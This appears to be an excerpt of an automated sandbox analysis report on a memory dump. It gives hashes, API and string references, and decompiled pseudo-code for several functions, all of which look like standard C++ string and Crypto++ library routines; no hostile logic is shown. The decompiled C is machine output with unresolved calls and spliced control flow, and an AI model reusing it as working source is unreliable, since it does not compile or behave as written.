Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 3a6b2992091e07f7910978b95266bedf1345fd0d928ffafce713a3703a5324c7
Instruction ID: cdad27cc7c76311011b9afe1a14093dff99d5805ba4910efa90f8753ca163a5e
Opcode Fuzzy Hash: 3a6b2992091e07f7910978b95266bedf1345fd0d928ffafce713a3703a5324c7
Instruction Fuzzy Hash: 89F054722001109FCB115F99D888E6AB7BDEB957203054066E90DFB261C770FC05C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00CA241A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA247F

Strings

invalid string position, xrefs: 00CA24A3
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00CA24B5

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$invalid string position
API String ID: 4104443479-2057747007
Opcode ID: 08fe9a6e7c635af15e096f5942fe3e310a859e56ee614e70ce4bab7c68ed91ad
Instruction ID: 328f6f2b8c473a4742de69d2b9b09dff44d383957e645b53f49a9d5f28525403
Opcode Fuzzy Hash: 08fe9a6e7c635af15e096f5942fe3e310a859e56ee614e70ce4bab7c68ed91ad
Instruction Fuzzy Hash: 0C213732300336ABDF249E5CDC80E6BB7AAEB8B758B000819F85997242C770DD40D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4CB55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4CB5C
__CxxThrowException@8.LIBCMT ref: 00E4CBD4

Strings

FilterWithBufferedInput: invalid buffer size, xrefs: 00E4CBA5

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: FilterWithBufferedInput: invalid buffer size
API String ID: 2985221223-2832723189
Opcode ID: 241ed3b7d7e1e6eba7a139642c5b7ec6aee8168b79da1d8bdced35ebc142f401
Instruction ID: c02fb742e658418c76e0fcbc9b7a5ddeaf1f0d01a599a1dbe9f41ebabe1d5ec6
Opcode Fuzzy Hash: 241ed3b7d7e1e6eba7a139642c5b7ec6aee8168b79da1d8bdced35ebc142f401
Instruction Fuzzy Hash: 3621D130600218EFCB24DF54D849EA8B7F4FF08365F205559E15CAB690CB71E989CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 34%

			E00CA73E5(void* __ebx, intOrPtr* __ecx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v40;
				intOrPtr _v56;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr* _v92;
				intOrPtr _v112;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				intOrPtr _t97;
				signed int _t100;
				signed int _t101;
				signed int _t103;
				signed int _t109;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t128;
				signed int _t129;
				intOrPtr* _t139;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr* _t146;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr* _t150;
				signed int _t151;
				signed int _t155;
				intOrPtr* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				intOrPtr* _t180;
				signed int _t182;
				intOrPtr* _t184;
				intOrPtr _t185;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				signed int _t201;
				intOrPtr* _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				void* _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t233;

				_t147 = __ebx;
				_t190 = _a4;
				_t212 = __ecx;
				_t88 = E00CA239B(__ecx, _t190);
				if(_t88 == 0) {
					_t161 =  *((intOrPtr*)(__ecx + 0x10));
					_push(__ebx);
					_t148 = _a8;
					if((_t88 | 0xffffffff) - _t161 <= _t148) {
						0xe48b37("string too long");
						asm("int3");
						_t227 = _t233;
						_push(_t148);
						_push(__ecx);
						_push(_t190);
						_t191 = _v16;
						_t213 = _t161;
						_t162 = _v12;
						_t91 =  *(_t191 + 0x10);
						if(_t91 < _t162) {
							0xe48b65("invalid string position");
							goto L35;
						} else {
							_t129 = _t91 - _t162;
							_t162 =  *(_t213 + 0x10);
							_v0 = _t162;
							_t148 =  <  ? _t129 : _a8;
							_t91 = (_t129 | 0xffffffff) - _t162;
							if(_t91 <= _t148) {
								L35:
								0xe48b37("string too long");
								asm("int3");
								_push(_t227);
								_t228 = _t233;
								_push(_t213);
								_t214 = _t162;
								_push(_t191);
								_t192 = _v40;
								_t163 =  *(_t214 + 0x10);
								if((_t91 | 0xffffffff) - _t163 <= _t192) {
									0xe48b37("string too long");
									asm("int3");
									_push(_t228);
									_t229 = _t233;
									_push(_t214);
									_push(_t192);
									_t193 = _v56;
									_t215 = _t163;
									_t94 = E00CA703E(_t163, _t193);
									if(_t94 == 0) {
										_t164 =  *(_t215 + 0x10);
										_push(_t148);
										_t149 = _v4;
										if((_t94 | 0xffffffff) - _t164 <= _t149) {
											0xe48b37("string too long");
											asm("int3");
											_push(_t229);
											_t230 = _t233;
											_push(_t215);
											_push(_t193);
											_t194 = _v76;
											_t216 = _t164;
											if(_t194 == 0xffffffff) {
												0xe48b37("string too long");
												asm("int3");
												_push(_t230);
												_t231 = _t233;
												_t97 = _v88;
												_push(_t149);
												_t150 = _v92;
												_push(_t216);
												_push(_t194);
												_t217 = _t164;
												_t66 = _t150 + 0x10; // 0x8b00172f
												_t195 =  *_t66;
												if(_t195 < _t97) {
													0xe48b65("invalid string position");
													asm("int3");
													_push(_t231);
													_push(_t217);
													_push(_t195);
													_t196 = _v112;
													_t218 = _t164;
													if(E00CA703E(_t164, _t196) == 0) {
														_push(_t150);
														_t151 = _v16;
														if(E00CA6E31(_t218, _t218, _t151, 0) != 0) {
															if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
																_t101 = _t218;
															} else {
																_t101 =  *_t218;
															}
															E00CA78CC(_t101, _t196, _t151);
															 *(_t218 + 0x10) = _t151;
															if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
																_t103 = _t218;
															} else {
																_t103 =  *_t218;
															}
															 *((short*)(_t103 + _t151 * 2)) = 0;
														}
														_t100 = _t218;
													} else {
														if( *((intOrPtr*)(_t218 + 0x14)) < 8) {
															_t100 = _t218;
														} else {
															_t100 =  *_t218;
														}
														_push(_v16);
														_push(_t196 - _t100 >> 1);
														_push(_t218);
														L72();
													}
													return _t100;
												} else {
													_t201 =  <  ? _v8 : _t195 - _t97;
													if(_t217 != _t150) {
														if(E00CA6E31(_t164, _t217, _t201, 0) != 0) {
															if( *((intOrPtr*)(_t150 + 0x14)) >= 8) {
																_t150 =  *_t150;
															}
															if( *((intOrPtr*)(_t217 + 0x14)) < 8) {
																_t168 = _t217;
															} else {
																_t168 =  *_t217;
															}
															E00CA78CC(_t168, _t150 + _v12 * 2, _t201);
															 *(_t217 + 0x10) = _t201;
															if( *((intOrPtr*)(_t217 + 0x14)) < 8) {
																_t109 = _t217;
															} else {
																_t109 =  *_t217;
															}
															 *((short*)(_t109 + _t201 * 2)) = 0;
														}
													} else {
														_push(_t97 + _t201);
														E00CA8331(_t150, _t164, _t201);
														E00CA8364(_t150, _t217, _t201, 0, _v12);
													}
													return _t217;
												}
											} else {
												_push(0);
												if(E00CA2338(_t164, _t194) != 0) {
													E00CA277F(_t216, 0, _t194, _v8);
													 *((intOrPtr*)(_t216 + 0x10)) = _t194;
													if( *((intOrPtr*)(_t216 + 0x14)) < 0x10) {
														_t117 = _t216;
													} else {
														_t117 =  *_t216;
													}
													 *((char*)(_t117 + _t194)) = 0;
												}
												return _t216;
											}
										} else {
											if(_t149 != 0) {
												_v4 = _t164 + _t149;
												if(E00CA6E31(_t215, _t215, _t164 + _t149, 0) != 0) {
													if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
														_t173 = _t215;
													} else {
														_t173 =  *_t215;
													}
													E00CA78CC(_t173 +  *(_t215 + 0x10) * 2, _t193, _t149);
													_t174 = _v4;
													 *(_t215 + 0x10) = _t174;
													if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
														_t124 = _t215;
													} else {
														_t124 =  *_t215;
													}
													 *((short*)(_t124 + _t174 * 2)) = 0;
												}
											}
											_t118 = _t215;
											goto L62;
										}
									} else {
										if( *((intOrPtr*)(_t215 + 0x14)) < 8) {
											_t118 = _t215;
										} else {
											_t118 =  *_t215;
										}
										_push(_v4);
										_push(_t193 - _t118 >> 1);
										_push(_t215);
										L20();
										L62:
										return _t118;
									}
								} else {
									if(_t192 != 0) {
										_push(_t148);
										_t155 = _t163 + _t192;
										if(E00CA6E31(_t214, _t214, _t155, 0) != 0) {
											E00CA69BD(_t214,  *(_t214 + 0x10), _t192, _v0);
											 *(_t214 + 0x10) = _t155;
											if( *((intOrPtr*)(_t214 + 0x14)) < 8) {
												_t128 = _t214;
											} else {
												_t128 =  *_t214;
											}
											 *((short*)(_t128 + _t155 * 2)) = 0;
										}
									}
									return _t214;
								}
							} else {
								if(_t148 != 0 && E00CA6E31(_t213, _t213, _t162 + _t148, 0) != 0) {
									if( *((intOrPtr*)(_t191 + 0x14)) >= 8) {
										_t191 =  *_t191;
									}
									if( *((intOrPtr*)(_t213 + 0x14)) < 8) {
										_t180 = _t213;
									} else {
										_t180 =  *_t213;
									}
									E00CA78CC(_t180 +  *(_t213 + 0x10) * 2, _t191 + _a4 * 2, _t148);
									_t182 = _v0 + _t148;
									 *(_t213 + 0x10) = _t182;
									if( *((intOrPtr*)(_t213 + 0x14)) < 8) {
										_t139 = _t213;
									} else {
										_t139 =  *_t213;
									}
									 *((short*)(_t139 + _t182 * 2)) = 0;
								}
								return _t213;
							}
						}
					} else {
						if(_t148 != 0) {
							_push(0);
							_a8 = _t161 + _t148;
							if(E00CA2338(__ecx, _t161 + _t148) != 0) {
								if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
									_t184 = __ecx;
								} else {
									_t184 =  *__ecx;
								}
								if(_t148 != 0) {
									0xe219a0( *((intOrPtr*)(_t212 + 0x10)) + _t184, _t190, _t148);
								}
								_t185 = _a8;
								 *((intOrPtr*)(_t212 + 0x10)) = _t185;
								if( *((intOrPtr*)(_t212 + 0x14)) < 0x10) {
									_t143 = _t212;
								} else {
									_t143 =  *_t212;
								}
								 *((char*)(_t143 + _t185)) = 0;
							}
						}
						_t140 = _t212;
						goto L18;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
						_t146 = __ecx;
					} else {
						_t146 =  *__ecx;
					}
					_push(_a8);
					_t140 = E00CA7305(_t147, _t212, _t190 - _t146, _t212, _t190 - _t146);
					L18:
					return _t140;
				}
			}

APIs

_memmove.LIBCMT ref: 00CA7455
std::_Xinvalid_argument.LIBCPMT ref: 00CA7481

Strings

string too long, xrefs: 00CA747C, 00CA7522

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 4a209ae67b9029738687e64b5c3ecdc90076af6db37adb7a87fa3c105d60834d
Instruction ID: 8165768a8fb0a5add1a82b6a0a4a7e31c3725d2cb554d9efd92cb39e2c7ee242
Opcode Fuzzy Hash: 4a209ae67b9029738687e64b5c3ecdc90076af6db37adb7a87fa3c105d60834d
Instruction Fuzzy Hash: 3C11D6313083529BDB349E699C44D56BFB9FB4B764B000A2DF8A587241C774E905DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CA7590(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				intOrPtr _t49;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t61;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t76;
				intOrPtr* _t77;
				signed int _t79;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t86;
				intOrPtr* _t90;
				intOrPtr* _t95;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				signed int _t108;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				void* _t127;

				_t100 = _a4;
				_t115 = __ecx;
				_t46 = E00CA703E(__ecx, _t100);
				if(_t46 == 0) {
					_t86 =  *((intOrPtr*)(__ecx + 0x10));
					_t79 = _a8;
					if((_t46 | 0xffffffff) - _t86 <= _t79) {
						0xe48b37("string too long");
						asm("int3");
						_t124 = _t127;
						_push(__ecx);
						_push(_t100);
						_t101 = _v16;
						_t116 = _t86;
						if(_t101 == 0xffffffff) {
							0xe48b37("string too long");
							asm("int3");
							_push(_t124);
							_t125 = _t127;
							_t49 = _v28;
							_push(_t79);
							_t80 = _v32;
							_push(_t116);
							_push(_t101);
							_t117 = _t86;
							_t24 = _t80 + 0x10; // 0x8b00172f
							_t102 =  *_t24;
							if(_t102 < _t49) {
								0xe48b65("invalid string position");
								asm("int3");
								_push(_t125);
								_push(_t117);
								_push(_t102);
								_t103 = _v52;
								_t118 = _t86;
								if(E00CA703E(_t86, _t103) == 0) {
									_push(_t80);
									_t81 = _v4;
									if(E00CA6E31(_t118, _t118, _t81, 0) != 0) {
										if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
											_t53 = _t118;
										} else {
											_t53 =  *_t118;
										}
										E00CA78CC(_t53, _t103, _t81);
										 *(_t118 + 0x10) = _t81;
										if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
											_t55 = _t118;
										} else {
											_t55 =  *_t118;
										}
										 *((short*)(_t55 + _t81 * 2)) = 0;
									}
									_t52 = _t118;
								} else {
									if( *((intOrPtr*)(_t118 + 0x14)) < 8) {
										_t52 = _t118;
									} else {
										_t52 =  *_t118;
									}
									_push(_v4);
									_push(_t103 - _t52 >> 1);
									_push(_t118);
									L26();
								}
								return _t52;
							} else {
								_t108 =  <  ? _a4 : _t102 - _t49;
								if(_t117 != _t80) {
									if(E00CA6E31(_t86, _t117, _t108, 0) != 0) {
										if( *((intOrPtr*)(_t80 + 0x14)) >= 8) {
											_t80 =  *_t80;
										}
										if( *((intOrPtr*)(_t117 + 0x14)) < 8) {
											_t90 = _t117;
										} else {
											_t90 =  *_t117;
										}
										E00CA78CC(_t90, _t80 + _v0 * 2, _t108);
										 *(_t117 + 0x10) = _t108;
										if( *((intOrPtr*)(_t117 + 0x14)) < 8) {
											_t61 = _t117;
										} else {
											_t61 =  *_t117;
										}
										 *((short*)(_t61 + _t108 * 2)) = 0;
									}
								} else {
									_push(_t49 + _t108);
									E00CA8331(_t80, _t86, _t108);
									E00CA8364(_t80, _t117, _t108, 0, _v0);
								}
								return _t117;
							}
						} else {
							_push(0);
							if(E00CA2338(_t86, _t101) != 0) {
								E00CA277F(_t116, 0, _t101, _a4);
								 *((intOrPtr*)(_t116 + 0x10)) = _t101;
								if( *((intOrPtr*)(_t116 + 0x14)) < 0x10) {
									_t69 = _t116;
								} else {
									_t69 =  *_t116;
								}
								 *((char*)(_t69 + _t101)) = 0;
							}
							return _t116;
						}
					} else {
						if(_t79 != 0) {
							_a8 = _t86 + _t79;
							if(E00CA6E31(__ecx, __ecx, _t86 + _t79, 0) != 0) {
								if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
									_t95 = __ecx;
								} else {
									_t95 =  *__ecx;
								}
								E00CA78CC(_t95 +  *(_t115 + 0x10) * 2, _t100, _t79);
								_t96 = _a8;
								 *(_t115 + 0x10) = _t96;
								if( *((intOrPtr*)(_t115 + 0x14)) < 8) {
									_t76 = _t115;
								} else {
									_t76 =  *_t115;
								}
								 *((short*)(_t76 + _t96 * 2)) = 0;
							}
						}
						_t70 = _t115;
						goto L16;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
						_t77 = __ecx;
					} else {
						_t77 =  *__ecx;
					}
					_push(_a8);
					_t70 = L00CA7487(_t115, _t115, _t100 - _t77 >> 1);
					L16:
					return _t70;
				}
			}

Strings

string too long, xrefs: 00CA7522, 00CA7585, 00CA7628
invalid string position, xrefs: 00CA7518

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID:
String ID: invalid string position$string too long
API String ID: 0-4289949731
Opcode ID: daae8d7fdf8156783834a376ada44157f837c64a4d9207d8376bcaf1b944f254
Instruction ID: d41460aa3b992976dd00e2d9984726a589ddbd84a29c5c6e41919a4c2f612bf6
Opcode Fuzzy Hash: daae8d7fdf8156783834a376ada44157f837c64a4d9207d8376bcaf1b944f254
Instruction Fuzzy Hash: 6811D331704B469BCB30DF6DCC4899A77A9FF827587004B2DF45587241DB30E909C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3FB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00CA3FB4(intOrPtr __ecx) {
				intOrPtr _t39;
				void* _t41;

				0xe214d0(0x14);
				_t39 = __ecx;
				 *((intOrPtr*)(_t41 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t41 - 0x10)) =  *((intOrPtr*)(_t41 + 8));
				0xe4bb11(0);
				 *((intOrPtr*)(__ecx)) = 0xe932f0;
				 *((intOrPtr*)(__ecx + 4)) = 0xe933b4;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(_t41 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((char*)(_t41 - 4)) = 2;
				0xe4c41d( *((intOrPtr*)(_t41 + 0x10)));
				_t36 = E00CA3110();
				 *((char*)(_t41 - 4)) = 3;
				0xe4ddd2(E00CA2FD4(_t36), "Log2Base", _t41 + 0xc,  *(_t27 + 8) & 0x000000ff, _t41 - 0x20, "DecodingLookupArray", _t41 - 0x10, 1);
				 *((char*)(_t41 - 4)) = 2;
				E00CA4C1B(_t41 - 0x1c);
				0xe2149e();
				return _t39;
			}

APIs

__EH_prolog3.LIBCMT ref: 00CA3FBB

Part of subcall function 00CA3110: __EH_prolog3.LIBCMT ref: 00CA3117

Part of subcall function 00CA2FD4: __EH_prolog3.LIBCMT ref: 00CA2FDB

Part of subcall function 00E4DDD2: __EH_prolog3_GS.LIBCMT ref: 00E4DDD9

Strings

Log2Base, xrefs: 00CA4030
DecodingLookupArray, xrefs: 00CA4013

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_
String ID: DecodingLookupArray$Log2Base
API String ID: 4240126716-3088352070
Opcode ID: c119eec4c4fe62f4a0091127fa25dc025310c51cb86e0bf7b5c239ed2220c402
Instruction ID: 3dc50a81c3df813615d63c2cfcad4b5c7448842a9bac2b4579179ab5272f034c
Opcode Fuzzy Hash: c119eec4c4fe62f4a0091127fa25dc025310c51cb86e0bf7b5c239ed2220c402
Instruction Fuzzy Hash: FA1142B090125AAECB01DFA9C9826ADFBF8BF58304F54515EE41CE7642D7749610CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E4C6B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4C6BB

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4C73C

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4C6E6

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 4213c1e36e5ca1944ab5c3338f862687ff798c5359d76ea6631d6352bb01f815
Instruction ID: 22878b61b9f6b4431ec5bd21f28508b62cdf964bff87353e9219ff94e2887bf0
Opcode Fuzzy Hash: 4213c1e36e5ca1944ab5c3338f862687ff798c5359d76ea6631d6352bb01f815
Instruction Fuzzy Hash: 8F018475940318BBDF10EBA4D846FCEBBBCAF25309F104185F905B3241CA749B889761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DBE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DBF3

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DC74

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DC1E

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 167931f954fd859e946fb997d022dfce60eb2ab98bcc92a0081537067030f36a
Instruction ID: 8407085a9156a56927be878e14c146695f813ec1e980aa419ff971c5de069a58
Opcode Fuzzy Hash: 167931f954fd859e946fb997d022dfce60eb2ab98bcc92a0081537067030f36a
Instruction Fuzzy Hash: 12014875940318BADF10EBA4DC45FCEBBBCAF65315F104185F905B7241CA749A88D761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DB51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DB5B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DBDC

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DB86

